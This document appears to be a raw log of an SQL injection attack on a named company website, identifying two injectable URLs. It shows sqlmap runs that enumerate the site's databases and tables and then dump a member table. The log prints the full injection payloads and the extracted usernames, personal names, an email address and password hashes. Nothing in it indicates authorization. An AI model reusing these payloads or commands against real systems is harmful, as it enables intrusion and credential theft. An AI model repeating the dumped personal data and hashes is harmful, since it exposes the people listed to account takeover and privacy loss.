Digital China (神州数码) test notes

http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097
http://www.digitalchina.com.hk/html/about_mgt_details.php?id=12097

Two SQL injection holes at the URLs above.

-----------------------------------------------------------------------------------------


root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --dbs

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:41:56

[20:41:56] [INFO] resuming back-end DBMS 'mysql' 
[20:41:56] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:41:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:41:57] [INFO] fetching database names
[20:41:57] [WARNING] reflective value(s) found and filtering out
[20:41:57] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:41:58] [WARNING] the SQL query provided does not return any output
[20:41:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:41:58] [INFO] fetching number of databases
[20:41:58] [INFO] resumed: 12
[20:41:58] [INFO] resumed: information_schema
[20:41:58] [INFO] resumed: bboard2_delete
[20:41:58] [INFO] resumed: kotocms003
[20:41:58] [INFO] resumed: mysql
[20:41:58] [INFO] resumed: performance_schema
[20:41:58] [INFO] resumed: test
[20:41:58] [INFO] resumed: tomocms2
[20:41:58] [INFO] resumed: tomocms2_center
[20:41:58] [INFO] resumed: tomocms2_cn
[20:41:58] [INFO] resumed: tomocms2_sg
[20:41:58] [INFO] resumed: tomocms2_tw
[20:41:58] [INFO] resumed: xinhuapinmei
available databases [12]:
[*] bboard2_delete
[*] information_schema
[*] kotocms003
[*] mysql
[*] performance_schema
[*] test
[*] tomocms2
[*] tomocms2_center
[*] tomocms2_cn
[*] tomocms2_sg
[*] tomocms2_tw
[*] xinhuapinmei

[20:41:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 20:41:58

root@root:~# 


root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --tables -D kotocms003

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:17:20

[20:17:21] [INFO] resuming back-end DBMS 'mysql' 
[20:17:21] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:17:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:17:21] [INFO] fetching tables for database: 'kotocms003'
[20:17:22] [WARNING] reflective value(s) found and filtering out
[20:17:22] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:17:22] [WARNING] the SQL query provided does not return any output
[20:17:22] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:17:22] [INFO] fetching number of tables for database 'kotocms003'
[20:17:22] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:17:22] [INFO] retrieved: 56
[20:17:26] [INFO] retrieved: access_log
[20:18:00] [INFO] retrieved: addon02_custom
[20:18:42] [INFO] retrieved: addon02_data
[20:19:06] [INFO] retrieved: addon02_element
[20:19:34] [INFO] retrieved: addon02_element_index
[20:19:59] [INFO] retrieved: addon02_fo
[20:20:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
rm
[20:20:48] [INFO] retrieved: addon02_history
[20:21:13] [INFO] retrieved: addon02_index
[20:21:32] [INFO] retrieved: addon02_submenu
[20:21:54] [INFO] retrieved: addon02_trans
[20:22:15] [INFO] retrieved: addon03_submenu
[20:22:48] [INFO] retrieved: addon04_data
[20:23:11] [INFO] retrieved: addon04_submenu
[20:23:35] [INFO] retrieved: addon04_templa
[20:24:29] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
te
[20:24:38] [INFO] retrieved: authority_info
[20:25:16] [INFO] retrieved: contact_result
[20:26:01] [INFO] retrieved: core01_data
[20:26:43] [INFO] retrieved: core01_history
[20:27:08] [INFO] retrieved: core01_index
[20:27:29] [INFO] retrieved: core01_s12
[20:27:45] [INFO] retrieved: core01_s13
[20:27:56] [INFO] retrieved: core01_s19
[20:28:04] [INFO] retrieved: core01_s20
[20:28:16] [INFO] retrieved: core01_s21
[20:28:25] [INFO] retrieved: core01_s6
[20:28:33] [INFO] retrieved: core01_s7
[20:28:41] [INFO] retrieved: core01_submenu
[20:29:09] [INFO] retrieved: core01_tr
[20:29:50] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ans
[20:29:58] [INFO] retrieved: core02_data
[20:30:18] [INFO] retrieved: core02_history
[20:30:51] [INFO] retrieved: core02_index
[20:31:15] [INFO] retrieved: core02_submenu
[20:31:38] [INFO] retrieved: core02_trans
[20:32:00] [INFO] retrieved: core03_data
[20:32:25] [INFO] retrieved: core03
[20:32:58] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
_history
[20:33:21] [INFO] retrieved: core03_index
[20:33:41] [INFO] retrieved: core03_submenu
[20:34:17] [INFO] retrieved: core03_trans
[20:34:37] [INFO] retrieved: email_templ
[20:35:47] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ate
[20:35:58] [INFO] retrieved: function01_cms_approve
[20:37:00] [INFO] retrieved: function01_cms_comment_history
[20:37:54] [INFO] retrieved: function01_cms_data
[20:38:18] [INFO] retrieved: function01_cms_field
[20:38:40] [INFO] retrieved: function01_cms_history
[20:39:13] [INFO] retrieved: function01_cms_index
[20:39:37] [INFO] retrieved: function01_cms_trans
[20:39:56] [INFO] retrieved: function01_cms_view
[20:40:15] [INFO] retrieved: function01_cms_view_history
[20:40:45] [INFO] retrieved: function01_cms_vote
[20:41:03] [INFO] retrieved: function01_cms_vote_history
[20:41:34] [INFO] retrieved: function01_submenu
[20:42:03] [INFO] retrieved: function02_mms_history
[20:42:47] [INFO] retrieved: function02_mms_log
[20:43:04] [INFO] retrieved: portal_index
[20:43:41] [INFO] retrieved: system01_preference
[20:44:36] [INFO] retrieved: system01_submenu
Database: kotocms003
[56 tables]
+--------------------------------+
| access_log                     |
| addon02_custom                 |
| addon02_data                   |
| addon02_element                |
| addon02_element_index          |
| addon02_form                   |
| addon02_history                |
| addon02_index                  |
| addon02_submenu                |
| addon02_trans                  |
| addon03_submenu                |
| addon04_data                   |
| addon04_submenu                |
| addon04_template               |
| authority_info                 |
| contact_result                 |
| core01_data                    |
| core01_history                 |
| core01_index                   |
| core01_s12                     |
| core01_s13                     |
| core01_s19                     |
| core01_s20                     |
| core01_s21                     |
| core01_s6                      |
| core01_s7                      |
| core01_submenu                 |
| core01_trans                   |
| core02_data                    |
| core02_history                 |
| core02_index                   |
| core02_submenu                 |
| core02_trans                   |
| core03_data                    |
| core03_history                 |
| core03_index                   |
| core03_submenu                 |
| core03_trans                   |
| email_template                 |
| function01_cms_approve         |
| function01_cms_comment_history |
| function01_cms_data            |
| function01_cms_field           |
| function01_cms_history         |
| function01_cms_index           |
| function01_cms_trans           |
| function01_cms_view            |
| function01_cms_view_history    |
| function01_cms_vote            |
| function01_cms_vote_history    |
| function01_submenu             |
| function02_mms_history         |
| function02_mms_log             |
| portal_index                   |
| system01_preference            |
| system01_submenu               |
+--------------------------------+

[20:45:02] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 20:45:02




root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --columns -T dede_member -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:49:27

[20:49:28] [INFO] resuming back-end DBMS 'mysql' 
[20:49:28] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:49:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:49:28] [INFO] fetching columns for table 'dede_member' in database 'xinhuapinmei'
[20:49:28] [WARNING] reflective value(s) found and filtering out
[20:49:28] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:49:29] [WARNING] the SQL query provided does not return any output
[20:49:29] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:49:29] [WARNING] unable to retrieve column names for table 'dede_member' in database 'xinhuapinmei'
do you want to use common column existence check? [y/N/q] n
[20:49:30] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 20:49:30

root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --columns -T dede_member -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:49:50

[20:49:50] [INFO] resuming back-end DBMS 'mysql' 
[20:49:50] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:49:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:49:50] [INFO] fetching columns for table 'dede_member' in database 'xinhuapinmei'
[20:49:51] [WARNING] reflective value(s) found and filtering out
[20:49:51] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:49:51] [WARNING] the SQL query provided does not return any output
[20:49:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:49:51] [WARNING] unable to retrieve column names for table 'dede_member' in database 'xinhuapinmei'
do you want to use common column existence check? [y/N/q] y
[20:49:53] [INFO] checking column existence using items from '/usr/share/sqlmap/txt/common-columns.txt'
[20:49:53] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 
[20:49:54] [WARNING] running in a single-thread mode. This could take a while.
[20:49:56] [INFO] retrieved: userid                                            
[20:50:00] [INFO] retrieved: email                                             
[20:50:25] [INFO] tried 73/2496 items (3%)
[20:50:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:51:21] [INFO] retrieved: mid                                               
[20:53:55] [INFO] tried 477/2496 items (19%)
[20:54:26] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[20:54:46] [INFO] retrieved: pwd                                               
[20:55:13] [INFO] retrieved: uname                                             
[21:00:17] [INFO] tried 1458/2496 items (58%)
[21:00:48] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[21:01:10] [INFO] tried 1519/2496 items (61%)^C

[21:01:10] [WARNING] user aborted during column existence check. sqlmap will display partial output
                                                                               
Database: xinhuapinmei
Table: dede_member
[5 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| email  | non-numeric |
| mid    | numeric     |
| pwd    | non-numeric |
| uname  | non-numeric |
| userid | non-numeric |
+--------+-------------+

[21:01:14] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 21:01:14

root@root:~#sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --dump -T dede_member -C "email,uname,pwd" -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 21:01:47

[21:01:47] [INFO] resuming back-end DBMS 'mysql' 
[21:01:47] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[21:01:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[21:01:47] [INFO] fetching columns 'email, pwd, uname' for table 'dede_member' in database 'xinhuapinmei'
[21:01:48] [WARNING] reflective value(s) found and filtering out
[21:01:48] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[21:01:48] [WARNING] the SQL query provided does not return any output
[21:01:48] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:01:48] [WARNING] unable to retrieve column names for table 'dede_member' in database 'xinhuapinmei'
[21:01:48] [INFO] fetching entries of column(s) 'email, mid, pwd, uname, userid' for table 'dede_member' in database 'xinhuapinmei'
[21:01:49] [WARNING] the SQL query provided does not return any output
[21:01:49] [INFO] fetching number of column(s) 'email, mid, pwd, uname, userid' entries for table 'dede_member' in database 'xinhuapinmei'
[21:01:49] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:01:49] [INFO] retrieved: 5
[21:01:52] [INFO] retrieved: 
[21:01:54] [WARNING] time-based comparison requires larger statistical model, please wait............
[21:01:59] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 

[21:02:02] [INFO] retrieved: 1
[21:02:08] [INFO] retrieved: a611731a28198c541f3c9f0f8a351173
[21:03:33] [INFO] retrieved: admin
[21:03:48] [INFO] retrieved: admin
[21:04:02] [INFO] retrieved: 
[21:04:04] [INFO] retrieved: 
[21:04:07] [INFO] retrieved: 2
[21:04:12] [INFO] retrieved: 479df66f8880a77d1077fe5056bf10ba
[21:05:36] [INFO] retrieved: 汤蕾
[21:06:59] [INFO] retrieved: tanglei
[21:07:18] [INFO] retrieved: 
[21:07:21] [INFO] retrieved: 
[21:07:23] [INFO] retrieved: 3
[21:07:28] [INFO] retrieved: 479df66f8880a77d1077fe5056bf10ba
[21:09:05] [INFO] retrieved: 
[21:10:07] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
钱晓乐
[21:11:33] [INFO] retrieved: qianxiaole
[21:12:07] [INFO] retrieved: 
[21:12:10] [INFO] retrieved: 
[21:12:14] [INFO] retrieved: 4
[21:12:20] [INFO] retrieved: 479df66f8880a77d1077f
[21:13:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
e5056bf10ba
[21:14:32] [INFO] retrieved: 
[21:15:34] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
刘惠迪
[21:17:02] [INFO] retrieved: liuhui
[21:17:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
di
[21:17:57] [INFO] retrieved: 
[21:18:29] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
liuyichi@gmail.com
[21:19:16] [INFO] retrieved: 5
[21:19:21] [INFO] retrieved: ee69dc27
[21:20:14] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
13e3c
[21:20:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
413414e38390930a5ca
[21:21:50] [INFO] retrieved: 张科
[21:23:04] [INFO] retrieved: zhangke
[21:23:25] [INFO] analyzing table dump for possible password hashes
[21:23:25] [INFO] recognized possible password hashes in column 'pwd'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: xinhuapinmei
Table: dede_member
[5 entries]
+-----+------------+----------------------------------+-------+--------------------+
| mid | userid     | pwd                              | uname | email              |
+-----+------------+----------------------------------+-------+--------------------+
| 1   | admin      | a611731a28198c541f3c9f0f8a351173 | admin | <blank>            |
| 2   | tanglei    | 479df66f8880a77d1077fe5056bf10ba | 汤蕾    | <blank>            |
| 3   | qianxiaole | 479df66f8880a77d1077fe5056bf10ba | 钱晓乐   | <blank>            |
| 4   | liuhuidi   | 479df66f8880a77d1077fe5056bf10ba | 刘惠迪   | <blank>            |
| 5   | zhangke    | ee69dc2713e3c413414e38390930a5ca | 张科    | liuyichi@gmail.com |
+-----+------------+----------------------------------+-------+--------------------+

[21:25:56] [INFO] table 'xinhuapinmei.dede_member' dumped to CSV file '/usr/share/sqlmap/output/www.digitalchina.com.hk/dump/xinhuapinmei/dede_member.csv'
[21:25:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 21:25:56

root@root:~#  


root@root:~# sqlmap -u http://www.digitalchina.com.hk/c/about_mgt_details.php?id=12097 --tables -D xinhuapinmei

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:17:46

[20:17:47] [INFO] resuming back-end DBMS 'mysql' 
[20:17:49] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:17:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:17:49] [INFO] fetching tables for database: 'xinhuapinmei'
[20:17:50] [WARNING] reflective value(s) found and filtering out
[20:17:50] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:17:50] [WARNING] the SQL query provided does not return any output
[20:17:50] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:17:50] [INFO] fetching number of tables for database 'xinhuapinmei'
[20:17:50] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:17:50] [INFO] retrieved: 86
[20:17:55] [INFO] retrieved: dede_addonarticle
[20:18:43] [INFO] retrieved: dede_addonimages
[20:19:04] [INFO] retrieved: dede_addoninfos
[20:19:24] [INFO] retrieved: dede_addonshop
[20:19:40] [INFO] retrieved: dede_addonsoft
[20:19:54] [INFO] retrieved: dede_addonspec
[20:20:11] [INFO] retrieved: dede_admin
[20:20:26] [INFO] retrieved: dede_admintype
[20:20:45] [INFO] retrieved: dede_ad
[20:21:19] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
vancedsearch
[20:22:01] [INFO] retrieved: dede_arcatt
[20:22:20] [INFO] retrieved: dede_arccache
[20:22:40] [INFO] retrieved: dede_archives
[20:22:58] [INFO] retrieved: dede_arcmulti
[20:23:17] [INFO] retrieved: dede_arcrank
[20:23:34] [INFO] retrieved: dede_arctiny
[20:23:50] [INFO] retrieved: dede_arctyp
[20:24:32] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
e
[20:24:39] [INFO] retrieved: dede_area
[20:24:50] [INFO] retrieved: dede_channeltype
[20:25:23] [INFO] retrieved: dede_co_htmls
[20:25:52] [INFO] retrieved: dede_co_mediaurls
[20:26:46] [INFO] retrieved: dede_co_note
[20:27:04] [INFO] retrieved: dede_co_onepage
[20:27:28] [INFO] retrieved: dede_co_urls
[20:27:44] [INFO] retrieved: dede_diyforms
[20:28:09] [INFO] retrieved: dede_dl_log
[20:28:28] [INFO] retrieved: dede_downloads
[20:28:55] [INFO] retrieved: ded
[20:29:27] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
e_erradd
[20:29:48] [INFO] retrieved: dede_feedback
[20:30:24] [INFO] retrieved: dede_flink
[20:30:42] [INFO] retrieved: dede_flinktype
[20:30:58] [INFO] retrieved: dede_freelist
[20:31:25] [INFO] retrieved: dede_homepagese
[20:32:28] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
t
[20:32:33] [INFO] retrieved: dede_keywords
[20:33:05] [INFO] retrieved: dede_log
[20:33:19] [INFO] retrieved: dede_member
[20:33:46] [INFO] retrieved: dede_member_company
[20:34:19] [INFO] retrieved: dede_member_f
[20:34:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
eed
[20:35:16] [INFO] retrieved: dede_member_fl
[20:35:59] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ink
[20:36:12] [INFO] retrieved: dede_member_friends
[20:36:41] [INFO] retrieved: dede_member_group
[20:37:04] [INFO] retrieved: dede_member_guestbook
[20:37:36] [INFO] retrieved: dede_member_model
[20:38:00] [INFO] retrieved: dede_member_msg
[20:38:27] [INFO] retrieved: dede_member_op
[20:39:12] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
eration
[20:39:33] [INFO] retrieved: dede_member_person
[20:40:26] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[20:40:30] [INFO] retrieved: dede_member_pms
[20:40:42] [INFO] retrieved: dede_member_snsmsg
[20:41:05] [INFO] retrieved: dede_member_space
[20:41:26] [INFO] retrieved: dede_member_stow
[20:41:46] [INFO] retrieved: dede_member_stowtype
[20:42:06] [INFO] retrieved: dede_member_tj
[20:42:21] [INFO] retrieved: dede_member_type
[20:42:37] [INFO] retrieved: dede_member_vhistory
[20:43:13] [INFO] retrieved: dede_moneycard_record
[20:43:59] [INFO] retrieved: dede_moneycard_type
[20:44:21] [INFO] retrieved: dede_mtypes
[20:44:39] [INFO] retrieved: dede_multiserv_config
[20:45:23] [INFO] retrieved: dede_myad
[20:45:39] [INFO] retrieved: dede_mytag
[20:45:51] [INFO] retrieved: dede_payment
[20:46:13] [INFO] retrieved: dede_plus
[20:46:27] [INFO] retrieved: dede_purview
[20:46:51] [INFO] retrieved: 
[20:47:22] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
dede_pwd_tmp
[20:47:45] [INFO] retrieved: dede_ratings
[20:48:07] [INFO] retrieved: dede_scores
[20:48:31] [INFO] retrieved: dede_search_cache
[20:49:04] [INFO] retrieved: dede_search_keywords
[20:49:30] [INFO] retrieved: dede_sgpage
[20:49:50] [INFO] retrieved: dede_shops_delivery
[20:50:32] [INFO] retrieved: dede_shops_orders
[20:50:54] [INFO] retrieved: dede_shops_products
[20:51:37] [INFO] retrieved: dede_shops_userinfo
[20:52:10] [INFO] retrieved: dede_softconfig
[20:52:40] [INFO] retrieved: dede_sphinx
[20:52:59] [INFO] retrieved: dede_stepselect
[20:53:28] [INFO] retrieved: dede_sys_enum
[20:53:52] [INFO] retrieved: d
[20:54:23] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
ede_sys_module
[20:54:44] [INFO] retrieved: dede_sys_set
[20:55:00] [INFO] retrieved: dede_sys_task
[20:55:16] [INFO] retrieved: dede_sysconfig
[20:55:38] [INFO] retrieved: dede_tagindex
[20:56:00] [INFO] retrieved: dede_taglist
[20:56:16] [INFO] retrieved: dede_uploads
[20:56:37] [INFO] retrieved: dede_verifies
[20:57:04] [INFO] retrieved: dede_vote
[20:57:18] [INFO] retrieved: dede_vote_member
Database: xinhuapinmei
[86 tables]
+-----------------------+
| dede_addonarticle     |
| dede_addonimages      |
| dede_addoninfos       |
| dede_addonshop        |
| dede_addonsoft        |
| dede_addonspec        |
| dede_admin            |
| dede_admintype        |
| dede_advancedsearch   |
| dede_arcatt           |
| dede_arccache         |
| dede_archives         |
| dede_arcmulti         |
| dede_arcrank          |
| dede_arctiny          |
| dede_arctype          |
| dede_area             |
| dede_channeltype      |
| dede_co_htmls         |
| dede_co_mediaurls     |
| dede_co_note          |
| dede_co_onepage       |
| dede_co_urls          |
| dede_diyforms         |
| dede_dl_log           |
| dede_downloads        |
| dede_erradd           |
| dede_feedback         |
| dede_flink            |
| dede_flinktype        |
| dede_freelist         |
| dede_homepageset      |
| dede_keywords         |
| dede_log              |
| dede_member           |
| dede_member_company   |
| dede_member_feed      |
| dede_member_flink     |
| dede_member_friends   |
| dede_member_group     |
| dede_member_guestbook |
| dede_member_model     |
| dede_member_msg       |
| dede_member_operation |
| dede_member_person    |
| dede_member_pms       |
| dede_member_snsmsg    |
| dede_member_space     |
| dede_member_stow      |
| dede_member_stowtype  |
| dede_member_tj        |
| dede_member_type      |
| dede_member_vhistory  |
| dede_moneycard_record |
| dede_moneycard_type   |
| dede_mtypes           |
| dede_multiserv_config |
| dede_myad             |
| dede_mytag            |
| dede_payment          |
| dede_plus             |
| dede_purview          |
| dede_pwd_tmp          |
| dede_ratings          |
| dede_scores           |
| dede_search_cache     |
| dede_search_keywords  |
| dede_sgpage           |
| dede_shops_delivery   |
| dede_shops_orders     |
| dede_shops_products   |
| dede_shops_userinfo   |
| dede_softconfig       |
| dede_sphinx           |
| dede_stepselect       |
| dede_sys_enum         |
| dede_sys_module       |
| dede_sys_set          |
| dede_sys_task         |
| dede_sysconfig        |
| dede_tagindex         |
| dede_taglist          |
| dede_uploads          |
| dede_verifies         |
| dede_vote             |
| dede_vote_member      |
+-----------------------+

[20:57:45] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.digitalchina.com.hk'

[*] shutting down at 20:57:45

